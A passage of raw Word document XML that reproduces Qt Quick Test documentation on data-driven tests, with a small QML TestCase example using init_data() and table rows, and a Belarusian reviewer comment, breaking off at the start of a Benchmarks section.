      <w:bookmarkStart w:id="1582" w:name="_Toc483003866"/>
      <w:bookmarkStart w:id="1583" w:name="_Toc483604218"/>
      <w:bookmarkStart w:id="1584" w:name="_Toc483605438"/>
      <w:bookmarkEnd w:id="1580"/>
      <w:r w:rsidRPr="00A724CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data-driven tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1581"/>
      <w:bookmarkEnd w:id="1582"/>
      <w:bookmarkEnd w:id="1583"/>
      <w:bookmarkEnd w:id="1584"/>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Table data</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be provided to a test using a function name that </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ends with "</w:t>
      </w:r>
      <w:hyperlink r:id="rId1944" w:anchor="data" w:history="1">
        <w:r w:rsidRPr="002E1325">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>_data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Alternatively, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>init_data()</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function can be used to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default test data</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all test functions in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1945" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TestCase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1946" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>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2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1947" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtTest</w:t>
        </w:r>
      </w:hyperlink>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1.1</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"DataTests"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> init_data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return</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tag</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"init_data_1"</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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answer</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3</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tag</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"init_data_2"</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</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answer</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6</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_table_data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return</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tag</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 2 = 4"</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2</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b</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2</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answer</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4</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tag</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 6 = 8"</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2</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b</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6</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answer</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8</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_table</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data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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//data comes from test_table_data</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compare</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data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a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data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b</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data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answer</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test__default_table</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data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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//data comes from init_data</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compare</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data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a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data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b</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data</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answer</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1325" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The test framework will iterate over all of the rows in the table</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pass each row to the test function. As shown, the columns can be extracted</w:t>
      </w:r>
      <w:r w:rsidR="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for use in the test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00597C1C" w:rsidRPr="00597C1C" w:rsidRDefault="00A724CC" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00597C1C" w:rsidRPr="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я праверыў. Усё работае.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is special - it is printed by the test framework when a row fails, </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to help</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reader </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which case failed amongst a set of otherwise passing tests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00A724CC" w:rsidRDefault="00302D13" w:rsidP="00A724CC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1585" w:name="benchmarks"/>
      <w:bookmarkStart w:id="1586" w:name="_Toc483000874"/>
      <w:bookmarkStart w:id="1587" w:name="_Toc483003867"/>
      <w:bookmarkStart w:id="1588" w:name="_Toc483604219"/>
      <w:bookmarkStart w:id="1589" w:name="_Toc483605439"/>
      <w:bookmarkEnd w:id="1585"/>
      <w:r w:rsidRPr="00A724CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Benchmarks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1586"/>
      <w:bookmarkEnd w:id="1587"/>
      <w:bookmarkEnd w:id="1588"/>
      <w:bookmarkEnd w:id="1589"/>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Functions whose names start with </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"benchmark_"</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be run multiple times with the </w:t>
